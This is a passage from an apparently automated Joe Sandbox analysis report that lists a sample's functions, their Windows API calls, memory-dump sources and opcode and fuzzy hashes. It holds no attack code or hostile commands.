                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: c394a820158a857472924a858012b0e2a9e1fec3136ac8767056c8ba5b5aa1da
                                • Instruction ID: 297c2206c4c8ec4be7d67b7b735e18b65f9acbb588b6ad94e5968090f0cdacef
                                • Opcode Fuzzy Hash: c394a820158a857472924a858012b0e2a9e1fec3136ac8767056c8ba5b5aa1da
                                • Instruction Fuzzy Hash: 7931A971D101589BCB61EFA4DE45FED73B8FF88310F1044A8BA1AAB281DE709E448B91
                                Function 009D2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,009DA3D0,000000FF), ref: 009D2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 009D2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,009DA3D0,000000FF), ref: 009D2BA2
                                • wsprintfA.USER32 ref: 009D2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: baf89f377a14e3130dfb332b4535b0203a2102ac7436191d60f75203e5d5d243
                                • Instruction ID: 5f851957fe33118b3f4cc56b43f0e7f477569ee12cdb80c24c335b7191bb4db5
                                • Opcode Fuzzy Hash: baf89f377a14e3130dfb332b4535b0203a2102ac7436191d60f75203e5d5d243
                                • Instruction Fuzzy Hash: 7B0140B2944568ABCB149BC9DD45FBEB7BCFB4CB12F00011AF605A6280EB785540C7B1
                                Function 009D4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 009D4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 009D44AD
                                • CloseHandle.KERNEL32(00000000), ref: 009D44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 969d3c48ef189e0dfbdd451735ece1a3714b92c72b023ae4dae42813becdc9ff
                                • Instruction ID: 5041bf3adad3465b2f87037a624032f5f41e8b48b97db9209a52671d71533dc5
                                • Opcode Fuzzy Hash: 969d3c48ef189e0dfbdd451735ece1a3714b92c72b023ae4dae42813becdc9ff
                                • Instruction Fuzzy Hash: 5CF0FCB09416552BE7209B749D89BE676ECEF14304F0045A1FA49DB290DFB48CC48790
                                Function 009D8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 009D8FDD
                                  • Part of subcall function 009D87FF: __amsg_exit.LIBCMT ref: 009D880F
                                • __getptd.LIBCMT ref: 009D8FF4
                                • __amsg_exit.LIBCMT ref: 009D9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 009D9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 647fe4eefcf408365221e6edda5c393ad0b80082a3ac885e1815fb83282e4f2c
                                • Instruction ID: 3a9a4581cb8d853c36296af699ff9569a4cb0f9ec1b8b26fd1de21593fd3e3b2
                                • Opcode Fuzzy Hash: 647fe4eefcf408365221e6edda5c393ad0b80082a3ac885e1815fb83282e4f2c
                                • Instruction Fuzzy Hash: B6F096329C87109BD761BBB8A84775E73A16F40714F24C50BF444AB3D2DF645900E655
                                Function 009D7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(------,009B5BEB), ref: 009D731B
                                • lstrcpy.KERNEL32(00000000), ref: 009D733F
                                • lstrcat.KERNEL32(?,------), ref: 009D7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: e2e21a7744b73fe06d8dbd96d5853c75f90e0cfb310ce329193f68c7def3bba0
                                • Instruction ID: 0f36216185ecedc7fa40dee1c5cdbf13cff7809dea46f689db4c633f01b9ab6b
                                • Opcode Fuzzy Hash: e2e21a7744b73fe06d8dbd96d5853c75f90e0cfb310ce329193f68c7def3bba0
                                • Instruction Fuzzy Hash: 6AF0C9745117429FDB649F75E988926FAF9EF84705328882EA89AC7314EB30D840CB50
                                Function 009C33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 33b870c0fa570619884641fd56475ee6bc8ce8ac2bb3e781e8645fdaf9d8d42f
                                • Instruction ID: 764e5bb435835d983da48f767b6253cd3b9dad887633dd3bdf8c3710857fe73a
                                • Opcode Fuzzy Hash: 33b870c0fa570619884641fd56475ee6bc8ce8ac2bb3e781e8645fdaf9d8d42f
                                • Instruction Fuzzy Hash: 5712FB70E012019FDB28CF19C598B25B7E9BF45718B29C0ADE809DB3A2D776DD42CB42
                                Function 009C7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7CAF
                                  • Part of subcall function 009C7D40: std::_Xinvalid_argument.LIBCPMT ref: 009C7D58
                                  • Part of subcall function 009C7D40: std::_Xinvalid_argument.LIBCPMT ref: 009C7D76
                                  • Part of subcall function 009C7D40: std::_Xinvalid_argument.LIBCPMT ref: 009C7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 32812d619b4f27117f54fa92d56dd9ab778fed4f248de44939c98625905c3615
                                • Instruction ID: 0846d8c3142478ae75a70e007c8e1bee861e70b4431098c86a81a7c5c738e035
                                • Opcode Fuzzy Hash: 32812d619b4f27117f54fa92d56dd9ab778fed4f248de44939c98625905c3615
                                • Instruction Fuzzy Hash: 67310D727482128BD724DDDCE880F6AF7E9EF91750B20492EF582C7741C7719C408BA6
                                Function 009B6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 009B6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 47ca3dfc0cce7c41c964fa2ad78c42132911f6bfc21423bf73788d9177532cf0
                                • Instruction ID: 644a6077bf6644103b13ab4c3df7c0f4c8b00396d85cfdfe1f5c9da037b4a8c1
                                • Opcode Fuzzy Hash: 47ca3dfc0cce7c41c964fa2ad78c42132911f6bfc21423bf73788d9177532cf0
                                • Instruction Fuzzy Hash: 47218EB06006029BEB20CB20DD84BB673F8EB41714F444968F946CB685FBB9F945C750
                                Function 009B1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000), ref: 009B162D
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000,?), ref: 009B164F
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000,?), ref: 009B1671
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000,?), ref: 009B1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: a89caf0593a05b35e9d4219b05d6e4074d68b6ce8f50729181d6485dc97e5079
                                • Instruction ID: f9d1a388a85ae44872a2ce862677e238846727f571eb283572d71795639e77da
                                • Opcode Fuzzy Hash: a89caf0593a05b35e9d4219b05d6e4074d68b6ce8f50729181d6485dc97e5079
                                • Instruction Fuzzy Hash: 6F31E874A11B42AFD724DF3AC698996BBF9FF88311740492DA896C3B10DB70F811CB80
                                Function 009D1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 009D15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 4a5691f87a190e0951721de15f9ab77ffb119ebb6c989b178c0216eecd3a0405
                                • Instruction ID: e3d5c0c6fb8f3d5d1b3928e873add7016bfd8b33e10e9b80310a7dcbfe383230
                                • Opcode Fuzzy Hash: 4a5691f87a190e0951721de15f9ab77ffb119ebb6c989b178c0216eecd3a0405
                                • Instruction Fuzzy Hash: ED211C75611B02ABD724DF6AD654B17B7F9EF84710B04891DA486D7B40DB34F841CB90
                                Function 009B1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 009B162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1693
                                Memory Dump Source
